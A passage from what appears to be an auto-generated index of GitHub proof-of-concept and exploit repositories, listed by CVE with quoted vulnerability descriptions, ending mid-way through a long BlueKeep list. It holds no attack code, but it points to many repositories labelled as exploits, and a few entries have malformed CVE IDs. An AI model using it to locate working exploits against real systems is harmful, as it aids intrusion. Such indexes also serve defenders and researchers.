[code-byter/CVE-2020-29669](https://github.com/code-byter/CVE-2020-29669) + +### CVE-2020-35191 (2020-12-17) + +The official drupal docker images before 8.5.10-fpm-alpine (Alpine specific) contain a blank password for a root user. System using the drupal docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password. + + +- [megadimenex/MegaHiDocker](https://github.com/megadimenex/MegaHiDocker) + +### CVE-2020-35262 (2021-01-06) + +Cross Site Scripting (XSS) vulnerability in Digisol DG-HR3400 can be exploited via the NTP server name in Time and date module and "Keyword" in URL Filter. + + +- [the-girl-who-lived/CVE-2020-35262](https://github.com/the-girl-who-lived/CVE-2020-35262) + +### CVE-2020-35314 (2021-04-20) + +A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer. + + +- [ybdegit2020/wonderplugin](https://github.com/ybdegit2020/wonderplugin) +- [AkashLingayat/WonderCMS-CVE-2020-35314](https://github.com/AkashLingayat/WonderCMS-CVE-2020-35314) + +### CVE-2020-35391 (2021-01-01) + +Tenda N300 F3 12.01.01.48 devices allow remote attackers to obtain sensitive information (possibly including an http_passwd line) via a direct request for cgi-bin/DownloadCfg/RouterCfm.cfg, a related issue to CVE-2017-14942. NOTE: the vulnerability report may suggest that either a ? character must be placed after the RouterCfm.cfg filename, or that the HTTP request headers must be unusual, but it is not known why these are relevant to the device's HTTP response behavior. + + +- [dumitory-dev/CVE-2020-35391-POC](https://github.com/dumitory-dev/CVE-2020-35391-POC) +- [H454NSec/CVE-2020-35391](https://github.com/H454NSec/CVE-2020-35391) + +### CVE-2020-35476 (2020-12-16) + +A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.) + + +- [glowbase/CVE-2020-35476](https://github.com/glowbase/CVE-2020-35476) + +### CVE-2020-35488 (2021-01-05) + +The fileop module of the NXLog service in NXLog Community Edition 2.10.2150 allows remote attackers to cause a denial of service (daemon crash) via a crafted Syslog payload to the Syslog service. This attack requires a specific configuration. Also, the name of the directory created must use a Syslog field. (For example, on Linux it is not possible to create a .. directory. On Windows, it is not possible to create a CON directory.) + + +- [GuillaumePetit84/CVE-2020-35488](https://github.com/GuillaumePetit84/CVE-2020-35488) +- [githubfoam/nxlog-ubuntu-githubactions](https://github.com/githubfoam/nxlog-ubuntu-githubactions) + +### CVE-2020-35489 (2020-12-17) + +The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. + + +- [dn9uy3n/Check-WP-CVE-2020-35489](https://github.com/dn9uy3n/Check-WP-CVE-2020-35489) +- [X0UCYB3R/Check-WP-CVE-2020-35489](https://github.com/X0UCYB3R/Check-WP-CVE-2020-35489) +- [reneoliveirajr/wp_CVE-2020-35489_checker](https://github.com/reneoliveirajr/wp_CVE-2020-35489_checker) +- [Cappricio-Securities/CVE-2020-35489](https://github.com/Cappricio-Securities/CVE-2020-35489) +- [g1thubb002/poc-CVE-2020-35489](https://github.com/g1thubb002/poc-CVE-2020-35489) + +### CVE-2020-35498 (2021-02-11) + +A vulnerability was found in openvswitch. A limitation in the implementation of userspace packet parsing can allow a malicious user to send a specially crafted packet causing the resulting megaflow in the kernel to be too wide, potentially causing a denial of service. The highest threat from this vulnerability is to system availability. + + +- [freddierice/cve-2020-35498-flag](https://github.com/freddierice/cve-2020-35498-flag) + +### CVE-2020-35545 (2020-12-17) + +Time-based SQL injection exists in Spotweb 1.4.9 via the query string. + + +- [bousalman/CVE-2020-35545](https://github.com/bousalman/CVE-2020-35545) + +### CVE-2020-35575 (2020-12-26) + +A password-disclosure issue in the web interface on certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. This affects WA901ND devices before 3.16.9(201211) beta, and Archer C5, Archer C7, MR3420, MR6400, WA701ND, WA801ND, WDR3500, WDR3600, WE843N, WR1043ND, WR1045ND, WR740N, WR741ND, WR749N, WR802N, WR840N, WR841HP, WR841N, WR842N, WR842ND, WR845N, WR940N, WR941HP, WR945N, WR949N, and WRD4300 devices. + + +- [dylvie/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure](https://github.com/dylvie/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure) + +### CVE-2020-35590 (2020-12-21) + +LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not limited to perform a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count does not ever reach the maximum allowed retries. + + +- [N4nj0/CVE-2020-35590](https://github.com/N4nj0/CVE-2020-35590) + +### CVE-2020-35606 (2020-12-21) + +Arbitrary command execution can occur in Webmin through 1.962. Any user authorized for the Package Updates module can execute arbitrary commands with root privileges via vectors involving %0A and %0C. NOTE: this issue exists because of an incomplete fix for CVE-2019-12840. + + +- [anasbousselham/webminscan](https://github.com/anasbousselham/webminscan) + +### CVE-2020-35669 (2020-12-24) + +An issue was discovered in the http package through 0.12.2 for Dart. If the attacker controls the HTTP method and the app is using Request directly, it's possible to achieve CRLF injection in an HTTP request. + + +- [n0npax/CVE-2020-35669](https://github.com/n0npax/CVE-2020-35669) + +### CVE-2020-35682 (2021-03-13) + +Zoho ManageEngine ServiceDesk Plus before 11134 allows an Authentication Bypass (only during SAML login). + + +- [its-arun/CVE-2020-35682](https://github.com/its-arun/CVE-2020-35682) + +### CVE-2020-35713 (2020-12-26) + +Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + + +- [Al1ex/CVE-2020-35713](https://github.com/Al1ex/CVE-2020-35713) + +### CVE-2020-35717 (2021-01-01) + +zonote through 0.4.0 allows XSS via a crafted note, with resultant Remote Code Execution (because nodeIntegration in webPreferences is true). + + +- [hmartos/cve-2020-35717](https://github.com/hmartos/cve-2020-35717) +- [Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-](https://github.com/Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-) + +### CVE-2020-35728 (2020-12-27) + +FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl). + + +- [Al1ex/CVE-2020-35728](https://github.com/Al1ex/CVE-2020-35728) + +### CVE-2020-35729 (2020-12-27) + +KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter. + + +- [Al1ex/CVE-2020-35729](https://github.com/Al1ex/CVE-2020-35729) + +### CVE-2020-35749 (2021-01-15) + +Directory traversal vulnerability in class-simple_job_board_resume_download_handler.php in the Simple Board Job plugin 2.9.3 and earlier for WordPress allows remote attackers to read arbitrary files via the sjb_file parameter to wp-admin/post.php. + + +- [M4xSec/Wordpress-CVE-2020-35749](https://github.com/M4xSec/Wordpress-CVE-2020-35749) + +### CVE-2020-35846 (2020-12-30) + +Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. + + +- [JohnHammond/CVE-2020-35846](https://github.com/JohnHammond/CVE-2020-35846) +- [0z09e/CVE-2020-35846](https://github.com/0z09e/CVE-2020-35846) + +### CVE-2020-35847 (2020-12-30) + +Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function. + + +- [w33vils/CVE-2020-35847_CVE-2020-35848](https://github.com/w33vils/CVE-2020-35847_CVE-2020-35848) + +### CVE-2020-36079 (2021-02-26) + +Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory. NOTE: the vendor disputes this because exploitation can only be performed by an admin who has "lots of other possibilities to harm a site. + + +- [azizalshammari/CVE-2020-36079.](https://github.com/azizalshammari/CVE-2020-36079.) + +### CVE-2020-36109 (2021-02-01) + +ASUS RT-AX86U router firmware below version under 9.0.0.4_386 has a buffer overflow in the blocking_request.cgi function of the httpd module that can cause code execution when an attacker constructs malicious data. + + +- [tin-z/CVE-2020-36109-POC](https://github.com/tin-z/CVE-2020-36109-POC) +- [sunn1day/CVE-2020-36109-POC](https://github.com/sunn1day/CVE-2020-36109-POC) + +### CVE-2020-36179 (2021-01-06) + +FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS. + + +- [Al1ex/CVE-2020-36179](https://github.com/Al1ex/CVE-2020-36179) + +### CVE-2020-36184 (2021-01-06) + +FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource. + + +- [Al1ex/CVE-2020-36184](https://github.com/Al1ex/CVE-2020-36184) + +### CVE-2020-36188 (2021-01-06) + +FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource. + + +- [Al1ex/CVE-2020-36188](https://github.com/Al1ex/CVE-2020-36188) + +### CVE-2020-36287 (2021-04-09) + +The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. + + +- [f4rber/CVE-2020-36287](https://github.com/f4rber/CVE-2020-36287) + +### CVE-2020-36518 (2022-03-11) + +jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. + + +- [ghillert/boot-jackson-cve](https://github.com/ghillert/boot-jackson-cve) + +### CVE-2020-36603 (2022-09-14) + +The HoYoVerse (formerly miHoYo) Genshin Impact mhyprot2.sys 1.0.0.0 anti-cheat driver does not adequately restrict unprivileged function calls, allowing local, unprivileged users to execute arbitrary code with SYSTEM privileges on Microsoft Windows systems. The mhyprot2.sys driver must first be installed by a user with administrative privileges. + + +- [gmh5225/CVE-2020-36603](https://github.com/gmh5225/CVE-2020-36603) + +### CVE-2020-36730 (2023-06-07) + +The CMP for WordPress is vulnerable to authorization bypass due to a missing capability check on the cmp_get_post_detail(), niteo_export_csv(), and cmp_disable_comingsoon_ajax() functions in versions up to, and including, 3.8.1. This makes it possible for unauthenticated attackers to read posts, export subscriber lists, and/or deactivate the plugin. + + +- [RandomRobbieBF/CVE-2020-36730](https://github.com/RandomRobbieBF/CVE-2020-36730) + +### CVE-2020-36732 (2023-06-12) + +The crypto-js package before 3.2.1 for Node.js generates random numbers by concatenating the string "0." with an integer, which makes the output more predictable than necessary. + + +- [miguelc49/CVE-2020-36732-2](https://github.com/miguelc49/CVE-2020-36732-2) +- [miguelc49/CVE-2020-36732-1](https://github.com/miguelc49/CVE-2020-36732-1) + +### CVE-2020-72381 +- [jdordonezn/CVE-2020-72381](https://github.com/jdordonezn/CVE-2020-72381) + +### CVE-2020-256480 +- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit) + ## 2019 +### CVE-2019-0053 (2019-07-11) + +Insufficient validation of environment variables in the telnet client supplied in Junos OS can lead to stack-based buffer overflows, which can be exploited to bypass veriexec restrictions on Junos OS. A stack-based overflow is present in the handling of environment variables when connecting via the telnet client to remote telnet servers. This issue only affects the telnet client — accessible from the CLI or shell — in Junos OS. Inbound telnet services are not affected by this issue. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S13; 12.3X48 versions prior to 12.3X48-D80; 14.1X53 versions prior to 14.1X53-D130, 14.1X53-D49; 15.1 versions prior to 15.1F6-S12, 15.1R7-S4; 15.1X49 versions prior to 15.1X49-D170; 15.1X53 versions prior to 15.1X53-D237, 15.1X53-D496, 15.1X53-D591, 15.1X53-D69; 16.1 versions prior to 16.1R3-S11, 16.1R7-S4; 16.2 versions prior to 16.2R2-S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R1-S8, 17.2R2-S7, 17.2R3-S1; 17.3 versions prior to 17.3R3-S4; 17.4 versions prior to 17.4R1-S6, 17.4R2-S3, 17.4R3; 18.1 versions prior to 18.1R2-S4, 18.1R3-S3; 18.2 versions prior to 18.2R1-S5, 18.2R2-S2, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; 18.3 versions prior to 18.3R1-S3, 18.3R2; 18.4 versions prior to 18.4R1-S2, 18.4R2. + + +- [dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD](https://github.com/dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD) + +### CVE-2019-0162 (2019-04-17) + +Memory access in virtual memory mapping for some microprocessors may allow an authenticated user to potentially enable information disclosure via local access. + + +- [saadislamm/SPOILER](https://github.com/saadislamm/SPOILER) + +### CVE-2019-0192 (2019-03-07) + +In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side. + + +- [mpgn/CVE-2019-0192](https://github.com/mpgn/CVE-2019-0192) +- [Rapidsafeguard/Solr-RCE-CVE-2019-0192](https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192) + +### CVE-2019-0193 (2019-08-01) + +In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. + + +- [xConsoIe/CVE-2019-0193](https://github.com/xConsoIe/CVE-2019-0193) +- [jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193) +- [1135/solr_exploit](https://github.com/1135/solr_exploit) +- [jaychouzzk/CVE-2019-0193-exp](https://github.com/jaychouzzk/CVE-2019-0193-exp) +- [freeFV/ApacheSolrRCE](https://github.com/freeFV/ApacheSolrRCE) + +### CVE-2019-0211 (2019-04-08) + +In Apache HTTP Server 2.4 releases 2.4.17 to 2.4.38, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute arbitrary code with the privileges of the parent process (usually root) by manipulating the scoreboard. Non-Unix systems are not affected. + + +- [ozkanbilge/Apache-Exploit-2019](https://github.com/ozkanbilge/Apache-Exploit-2019) + +### CVE-2019-0217 (2019-04-08) + +In Apache HTTP Server 2.4 release 2.4.38 and prior, a race condition in mod_auth_digest when running in a threaded server could allow a user with valid credentials to authenticate using another username, bypassing configured access control restrictions. + + +- [savsch/PoC_CVE-2019-0217](https://github.com/savsch/PoC_CVE-2019-0217) + +### CVE-2019-0227 (2019-05-01) + +A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue. + + +- [ianxtianxt/cve-2019-0227](https://github.com/ianxtianxt/cve-2019-0227) + +### CVE-2019-0230 (2020-09-14) + +Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. + + +- [PrinceFPF/CVE-2019-0230](https://github.com/PrinceFPF/CVE-2019-0230) +- [ramoncjs3/CVE-2019-0230](https://github.com/ramoncjs3/CVE-2019-0230) +- [f8al/CVE-2019-0230-PoC](https://github.com/f8al/CVE-2019-0230-PoC) +- [Al1ex/CVE-2019-0230](https://github.com/Al1ex/CVE-2019-0230) +- [tw-eason-tseng/CVE-2019-0230_Struts2S2-059](https://github.com/tw-eason-tseng/CVE-2019-0230_Struts2S2-059) + +### CVE-2019-0232 (2019-04-15) + +When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/). + + +- [pyn3rd/CVE-2019-0232](https://github.com/pyn3rd/CVE-2019-0232) +- [jas502n/CVE-2019-0232](https://github.com/jas502n/CVE-2019-0232) +- [cyy95/CVE-2019-0232-EXP](https://github.com/cyy95/CVE-2019-0232-EXP) +- [setrus/CVE-2019-0232](https://github.com/setrus/CVE-2019-0232) +- [Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-](https://github.com/Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-) +- [Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232](https://github.com/Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232) +- [jaiguptanick/CVE-2019-0232](https://github.com/jaiguptanick/CVE-2019-0232) +- [xsxtw/CVE-2019-0232](https://github.com/xsxtw/CVE-2019-0232) + +### CVE-2019-0539 (2019-01-08) + +A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2019-0567, CVE-2019-0568. + + +- [0x43434343/CVE-2019-0539](https://github.com/0x43434343/CVE-2019-0539) + +### CVE-2019-0567 (2019-01-08) + +A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2019-0539, CVE-2019-0568. + + +- [NatteeSetobol/Chakra-CVE-2019-0567](https://github.com/NatteeSetobol/Chakra-CVE-2019-0567) +- [NatteeSetobol/CVE-2019-0567-MS-Edge](https://github.com/NatteeSetobol/CVE-2019-0567-MS-Edge) + +### CVE-2019-0604 (2019-03-06) + +A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594. + + +- [linhlhq/CVE-2019-0604](https://github.com/linhlhq/CVE-2019-0604) +- [likekabin/CVE-2019-0604_sharepoint_CVE](https://github.com/likekabin/CVE-2019-0604_sharepoint_CVE) +- [k8gege/CVE-2019-0604](https://github.com/k8gege/CVE-2019-0604) +- [m5050/CVE-2019-0604](https://github.com/m5050/CVE-2019-0604) +- [boxhg/CVE-2019-0604](https://github.com/boxhg/CVE-2019-0604) +- [Gh0st0ne/weaponized-0604](https://github.com/Gh0st0ne/weaponized-0604) +- [davidlebr1/cve-2019-0604-SP2010-netv3.5](https://github.com/davidlebr1/cve-2019-0604-SP2010-netv3.5) + +### CVE-2019-0623 (2019-03-06) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. + + +- [Anti-ghosts/CVE-2019-0623-32-exp](https://github.com/Anti-ghosts/CVE-2019-0623-32-exp) + +### CVE-2019-0678 (2019-04-08) + +An elevation of privilege vulnerability exists when Microsoft Edge does not properly enforce cross-domain policies, which could allow an attacker to access information from one domain and inject it into another domain.In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability, aka 'Microsoft Edge Elevation of Privilege Vulnerability'. + + +- [sharmasandeepkr/CVE-2019-0678](https://github.com/sharmasandeepkr/CVE-2019-0678) + +### CVE-2019-0708 (2019-05-16) + +A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'. + + +- [hook-s3c/CVE-2019-0708-poc](https://github.com/hook-s3c/CVE-2019-0708-poc) +- [SherlockSec/CVE-2019-0708](https://github.com/SherlockSec/CVE-2019-0708) +- [yetiddbb/CVE-2019-0708-PoC](https://github.com/yetiddbb/CVE-2019-0708-PoC) +- [p0p0p0/CVE-2019-0708-exploit](https://github.com/p0p0p0/CVE-2019-0708-exploit) +- [rockmelodies/CVE-2019-0708-Exploit](https://github.com/rockmelodies/CVE-2019-0708-Exploit) +- [anquanscan/CVE-2019-0708](https://github.com/anquanscan/CVE-2019-0708) +- [xiyangzuishuai/Dark-Network-CVE-2019-0708](https://github.com/xiyangzuishuai/Dark-Network-CVE-2019-0708) +- [temp-user-2014/CVE-2019-0708](https://github.com/temp-user-2014/CVE-2019-0708) +- [areusecure/CVE-2019-0708](https://github.com/areusecure/CVE-2019-0708) +- [pry0cc/cve-2019-0708-2](https://github.com/pry0cc/cve-2019-0708-2) +- [sbkcbig/CVE-2019-0708-EXPloit](https://github.com/sbkcbig/CVE-2019-0708-EXPloit) +- [sbkcbig/CVE-2019-0708-EXPloit-3389](https://github.com/sbkcbig/CVE-2019-0708-EXPloit-3389) +- [YSheldon/MS_T120](https://github.com/YSheldon/MS_T120) +- [k8gege/CVE-2019-0708](https://github.com/k8gege/CVE-2019-0708) +- [hotdog777714/RDS_CVE-2019-0708](https://github.com/hotdog777714/RDS_CVE-2019-0708) +- [jiansiting/CVE-2019-0708](https://github.com/jiansiting/CVE-2019-0708) +- [NullByteSuiteDevs/CVE-2019-0708](https://github.com/NullByteSuiteDevs/CVE-2019-0708) +- [thugcrowd/CVE-2019-0708](https://github.com/thugcrowd/CVE-2019-0708) +- [blacksunwen/CVE-2019-0708](https://github.com/blacksunwen/CVE-2019-0708) +- [infenet/CVE-2019-0708](https://github.com/infenet/CVE-2019-0708) +- [n0auth/CVE-2019-0708](https://github.com/n0auth/CVE-2019-0708) +- [gildaaa/CVE-2019-0708](https://github.com/gildaaa/CVE-2019-0708) +- [sbkcbig/CVE-2019-0708-Poc-exploit](https://github.com/sbkcbig/CVE-2019-0708-Poc-exploit) +- [HackerJ0e/CVE-2019-0708](https://github.com/HackerJ0e/CVE-2019-0708) +- [syriusbughunt/CVE-2019-0708](https://github.com/syriusbughunt/CVE-2019-0708) +- [Barry-McCockiner/CVE-2019-0708](https://github.com/Barry-McCockiner/CVE-2019-0708) +- [ShadowBrokers-ExploitLeak/CVE-2019-0708](https://github.com/ShadowBrokers-ExploitLeak/CVE-2019-0708) +- [safly/CVE-2019-0708](https://github.com/safly/CVE-2019-0708) +- [Jaky5155/cve-2019-0708-exp](https://github.com/Jaky5155/cve-2019-0708-exp) +- [fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status](https://github.com/fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status) +- [303sec/CVE-2019-0708](https://github.com/303sec/CVE-2019-0708) +- [f8al/CVE-2019-0708-POC](https://github.com/f8al/CVE-2019-0708-POC) +- [blockchainguard/CVE-2019-0708](https://github.com/blockchainguard/CVE-2019-0708) +- [yushiro/CVE-2019-0708](https://github.com/yushiro/CVE-2019-0708) +- [skyshell20082008/CVE-2019-0708-PoC-Hitting-Path](https://github.com/skyshell20082008/CVE-2019-0708-PoC-Hitting-Path) +- [ttsite/CVE-2019-0708-](https://github.com/ttsite/CVE-2019-0708-) +- [ttsite/CVE-2019-0708](https://github.com/ttsite/CVE-2019-0708) +- [biggerwing/CVE-2019-0708-poc](https://github.com/biggerwing/CVE-2019-0708-poc) +- [n1xbyte/CVE-2019-0708](https://github.com/n1xbyte/CVE-2019-0708) +- [freeide/CVE-2019-0708](https://github.com/freeide/CVE-2019-0708) +- [edvacco/CVE-2019-0708-POC](https://github.com/edvacco/CVE-2019-0708-POC) +- [pry0cc/BlueKeepTracker](https://github.com/pry0cc/BlueKeepTracker) +- [zjw88282740/CVE-2019-0708-win7](https://github.com/zjw88282740/CVE-2019-0708-win7) +- [victor0013/CVE-2019-0708](https://github.com/victor0013/CVE-2019-0708) +- [herhe/CVE-2019-0708poc](https://github.com/herhe/CVE-2019-0708poc) +- [l9c/rdp0708scanner](https://github.com/l9c/rdp0708scanner) +- [major203/cve-2019-0708-scan](https://github.com/major203/cve-2019-0708-scan) +- [SugiB3o/Check-vuln-CVE-2019-0708](https://github.com/SugiB3o/Check-vuln-CVE-2019-0708) +- [gobysec/CVE-2019-0708](https://github.com/gobysec/CVE-2019-0708) +- [smallFunction/CVE-2019-0708-POC](https://github.com/smallFunction/CVE-2019-0708-POC) +- [freeide/CVE-2019-0708-PoC-Exploit](https://github.com/freeide/CVE-2019-0708-PoC-Exploit) +- [robertdavidgraham/rdpscan](https://github.com/robertdavidgraham/rdpscan) +- [closethe/CVE-2019-0708-POC](https://github.com/closethe/CVE-2019-0708-POC) +- [SQLDebugger/CVE-2019-0708-Tool](https://github.com/SQLDebugger/CVE-2019-0708-Tool) +- [Rostelecom-CERT/bluekeepscan](https://github.com/Rostelecom-CERT/bluekeepscan) +- [Leoid/CVE-2019-0708](https://github.com/Leoid/CVE-2019-0708) +- [ht0Ruial/CVE-2019-0708Poc-BatchScanning](https://github.com/ht0Ruial/CVE-2019-0708Poc-BatchScanning) +- [oneoy/BlueKeep](https://github.com/oneoy/BlueKeep) +- [infiniti-team/CVE-2019-0708](https://github.com/infiniti-team/CVE-2019-0708) +- [haishanzheng/CVE-2019-0708-generate-hosts](https://github.com/haishanzheng/CVE-2019-0708-generate-hosts) +- [Ekultek/BlueKeep](https://github.com/Ekultek/BlueKeep) +- [UraSecTeam/CVE-2019-0708](https://github.com/UraSecTeam/CVE-2019-0708) +- [Gh0st0ne/rdpscan-BlueKeep](https://github.com/Gh0st0ne/rdpscan-BlueKeep) +- [algo7/bluekeep_CVE-2019-0708_poc_to_exploit](https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit) +- [JasonLOU/CVE-2019-0708](https://github.com/JasonLOU/CVE-2019-0708) +- [AdministratorGithub/CVE-2019-0708](https://github.com/AdministratorGithub/CVE-2019-0708) +- [umarfarook882/CVE-2019-0708](https://github.com/umarfarook882/CVE-2019-0708) +- [HynekPetrak/detect_bluekeep.py](https://github.com/HynekPetrak/detect_bluekeep.py) +- [Pa55w0rd/CVE-2019-0708](https://github.com/Pa55w0rd/CVE-2019-0708) +- [at0mik/CVE-2019-0708-PoC](https://github.com/at0mik/CVE-2019-0708-PoC) +- [cream-sec/CVE-2019-0708-Msf--](https://github.com/cream-sec/CVE-2019-0708-Msf--) +- [ZhaoYukai/CVE-2019-0708](https://github.com/ZhaoYukai/CVE-2019-0708) +- [ZhaoYukai/CVE-2019-0708-Batch-Blue-Screen](https://github.com/ZhaoYukai/CVE-2019-0708-Batch-Blue-Screen) +- [wdfcc/CVE-2019-0708](https://github.com/wdfcc/CVE-2019-0708) +- [cvencoder/cve-2019-0708](https://github.com/cvencoder/cve-2019-0708) +- [ze0r/CVE-2019-0708-exp](https://github.com/ze0r/CVE-2019-0708-exp) +- [mekhalleh/cve-2019-0708](https://github.com/mekhalleh/cve-2019-0708) +- [cve-2019-0708-poc/cve-2019-0708](https://github.com/cve-2019-0708-poc/cve-2019-0708) +- [andripwn/CVE-2019-0708](https://github.com/andripwn/CVE-2019-0708) +- [0xeb-bp/bluekeep](https://github.com/0xeb-bp/bluekeep) +- [ntkernel0/CVE-2019-0708](https://github.com/ntkernel0/CVE-2019-0708) +- [dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-](https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-) +- [turingcompl33t/bluekeep](https://github.com/turingcompl33t/bluekeep) +- [fade-vivida/CVE-2019-0708-test](https://github.com/fade-vivida/CVE-2019-0708-test) +- [skommando/CVE-2019-0708](https://github.com/skommando/CVE-2019-0708) +- [RickGeex/msf-module-CVE-2019-0708](https://github.com/RickGeex/msf-module-CVE-2019-0708) +- [wqsemc/CVE-2019-0708](https://github.com/wqsemc/CVE-2019-0708) +- [Micr067/CVE-2019-0708RDP-MSF](https://github.com/Micr067/CVE-2019-0708RDP-MSF) +- [FrostsaberX/CVE-2019-0708](https://github.com/FrostsaberX/CVE-2019-0708) +- [0x6b7966/CVE-2019-0708-RCE](https://github.com/0x6b7966/CVE-2019-0708-RCE) +- [qing-root/CVE-2019-0708-EXP-MSF-](https://github.com/qing-root/CVE-2019-0708-EXP-MSF-) +- [distance-vector/CVE-2019-0708](https://github.com/distance-vector/CVE-2019-0708) +- [0xFlag/CVE-2019-0708-test](https://github.com/0xFlag/CVE-2019-0708-test) +- [1aa87148377/CVE-2019-0708](https://github.com/1aa87148377/CVE-2019-0708) +- [coolboy4me/cve-2019-0708_bluekeep_rce](https://github.com/coolboy4me/cve-2019-0708_bluekeep_rce) +- [Cyb0r9/ispy](https://github.com/Cyb0r9/ispy) +- [ulisesrc/-2-CVE-2019-0708](https://github.com/ulisesrc/-2-CVE-2019-0708) +- [worawit/CVE-2019-0708](https://github.com/worawit/CVE-2019-0708) +- [Ameg-yag/Wincrash](https://github.com/Ameg-yag/Wincrash) +- 